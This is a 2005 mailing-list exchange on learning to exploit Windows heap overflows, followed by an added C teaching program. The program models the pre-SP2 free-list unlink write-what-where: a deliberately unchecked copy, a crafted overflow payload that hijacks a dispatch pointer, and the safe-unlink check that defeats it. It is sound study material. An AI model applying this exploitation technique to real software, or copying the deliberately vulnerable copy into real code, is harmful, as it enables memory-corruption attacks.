Re: [Dailydave] Understanding Windows Heap Overflows

From: Nicolas Waisman (nicolasimmunitysec.com)
Date: Fri Oct 07 2005 - 10:42:36 CDT


The best way to learn is going real. I recommend you try
exploiting MS05_021 (the X-LINK2STATE bug); with that bug you will
be able to play pretty easily with the heap layout (which is the real
challenge in heap exploitation: getting whatever primitive you need).

Peace,
Nico

On Fri, Oct 07, 2005 at 10:01:27AM +0100, pbb wrote:
> Thanks guys for all the responses,
>
> I've actually had an app I was playing with (that I suspected had a
> heap overflow, which I was trying to exploit) get an overflow with
> control of the eax and ecx registers, so I thought I had it but couldn't
> move from there to executing code. I haven't looked at it for a while as
> I knew I didn't understand the technique as well as I thought. I hope
> that I can step through the examples you guys have given me and
> progress ever so slightly in my knowledge of these types of
> exploitation.
>
> I've been stepping through Brett's link and hope this will get me over
> the issue I was having. I'm not sure if it's because the app I was
> looking at was multithreaded and the overflows are not simple like a
> stack one, where at the end of the overflowed function it executes.
>
> I'll try and look at Matt's example over the weekend. Thanks for the help.
>
> Paul.
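The primitive behind Nico's "get whatever primitive you need" and Paul's "control of eax and ecx" is the free-list unlink of the XP SP1-era Windows heap: when a chunk is popped off a doubly linked free list, the allocator does two unchecked pointer writes using the chunk's Flink and Blink, so an overflow that reaches a neighbouring free chunk's list entry yields a write-what-where (the classic "write-4"). The program below is an added example written for this archive page, not code from the thread, from Immunity or from Windows: it models two adjacent chunks in a constructed `struct arena`, an attacker-controlled overflow into chunk B's `LIST_ENTRY`, the classic unlink beside the back-pointer check that XP SP2 / Server 2003 SP1 added, and a constructed `struct dispatch` target that stands in for the function pointer an exploit would hijack. The names `arena`, `dispatch`, `run_exploit`, `craft_payload`, `vulnerable_copy`, `benign` and `pwned` are assumptions of this example; the `HEAP_ENTRY` header is modelled as opaque bytes.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Doubly linked free-list entry, the same shape as the Windows LIST_ENTRY that
 * RtlHeap kept in the first bytes of a free chunk's user area. */
typedef struct list_entry {
    struct list_entry *Flink;
    struct list_entry *Blink;
} LIST_ENTRY;

#define A_SIZE   16  /* chunk A: in use, the buffer the application writes into */
#define HDR_SIZE 8   /* chunk B header (HEAP_ENTRY: size, flags, ...), modelled as opaque bytes */

/* Two adjacent chunks of a heap segment (constructed layout for this example). */
struct arena {
    unsigned char a_data[A_SIZE];
    unsigned char b_header[HDR_SIZE];
    LIST_ENTRY    b_links;   /* valid only while chunk B sits on a free list */
};

/* The application's dispatch object: what the attacker wants to hijack (constructed). */
struct dispatch { void (*fn)(void); void *ctx; };

static int g_pwned;
static void benign(void) { }
static void pwned(void)  { g_pwned = 1; }   /* stands in for shellcode */
static struct dispatch real_dispatch = { benign, NULL };
/* volatile: force a fresh load after the unlink writes through a differently typed pointer */
static struct dispatch * volatile g_dispatch = &real_dispatch;

/* Classic unlink (XP SP1 and earlier): two unchecked pointer-sized writes.
 * With Flink/Blink under attacker control this is the write-what-where. */
static void unlink_classic(LIST_ENTRY *e)
{
    LIST_ENTRY *flink = e->Flink;  /* attacker-controlled "what"  */
    LIST_ENTRY *blink = e->Blink;  /* attacker-controlled "where" */
    blink->Flink = flink;          /* *where             = what              */
    flink->Blink = blink;          /* *(what + ptrsize)  = where (reflected) */
}

/* Safe unlink (XP SP2 / 2003 SP1 style): both neighbours must point back at e. */
static int unlink_safe(LIST_ENTRY *e)
{
    if (e->Flink->Blink != e || e->Blink->Flink != e)
        return 0;                  /* corrupted list: refuse instead of writing */
    unlink_classic(e);
    return 1;
}

/* The bug: copies len bytes into the 16-byte chunk A without checking len. */
static void vulnerable_copy(unsigned char *chunk_a, const unsigned char *src, size_t len)
{
    memcpy(chunk_a, src, len);
}

/* Overflow payload: filler for A, a fake B header, then the poisoned Flink/Blink. */
static void craft_payload(unsigned char *out, size_t len, void *what, void *where)
{
    memset(out, 'A', len);
    memcpy(out + A_SIZE + HDR_SIZE, &what, sizeof what);
    memcpy(out + A_SIZE + HDR_SIZE + sizeof what, &where, sizeof where);
}

/* Returns 1 if the hijacked dispatch ran pwned(), 0 otherwise. */
static int run_exploit(int use_safe_unlink)
{
    union { struct arena h; unsigned char raw[sizeof(struct arena)]; } seg;
    LIST_ENTRY head;
    unsigned char payload[sizeof(struct arena)];
    /* Fake object in writable attacker memory. Its second field is a sacrificial
     * slot for the reflected write, which is why "what" cannot point straight at
     * read-only code. */
    struct dispatch fake = { pwned, NULL };

    g_pwned = 0;
    g_dispatch = &real_dispatch;

    /* Honest free list before the overflow: head <-> B. */
    head.Flink = head.Blink = &seg.h.b_links;
    seg.h.b_links.Flink = seg.h.b_links.Blink = &head;

    /* The heap-layout part: A is immediately followed by free chunk B, so the
     * overflow from A rewrites B's Flink/Blink. what = &fake, where = &g_dispatch. */
    craft_payload(payload, sizeof payload, &fake, (void *)&g_dispatch);
    vulnerable_copy(seg.raw + offsetof(struct arena, a_data), payload, sizeof payload);

    /* The next allocation of B's size pops B off its free list: the unlink fires. */
    if (use_safe_unlink) {
        if (!unlink_safe(&seg.h.b_links))
            return 0;              /* detected; a real heap raises an exception here */
    } else {
        unlink_classic(&seg.h.b_links);   /* g_dispatch = &fake; fake.ctx = &g_dispatch */
    }

    g_dispatch->fn();              /* the application's normal dispatch call */
    return g_pwned;
}

/* The safe unlink still accepts an honest free list. */
static int legit_unlink(void)
{
    LIST_ENTRY head, b;
    head.Flink = head.Blink = &b;
    b.Flink = b.Blink = &head;
    return unlink_safe(&b) && head.Flink == &head && head.Blink == &head;
}

int main(void)
{
    printf("classic unlink: pwned=%d\n", run_exploit(0));
    printf("safe unlink:    pwned=%d\n", run_exploit(1));
    printf("honest list:    ok=%d\n", legit_unlink());
    return 0;
}
```

The two writes in `unlink_classic` are the pair Paul saw in eax and ecx: the first plants the attacker's value at the chosen address, the second reflects the address back to `what + sizeof(void *)`, so the value written must point into memory that tolerates that clobber (a fake object or shellcode that jumps over its first bytes). The work Nico describes as the real challenge is everything before the unlink: arranging allocations so that the overflowed buffer is directly followed by a free chunk that the program will allocate next.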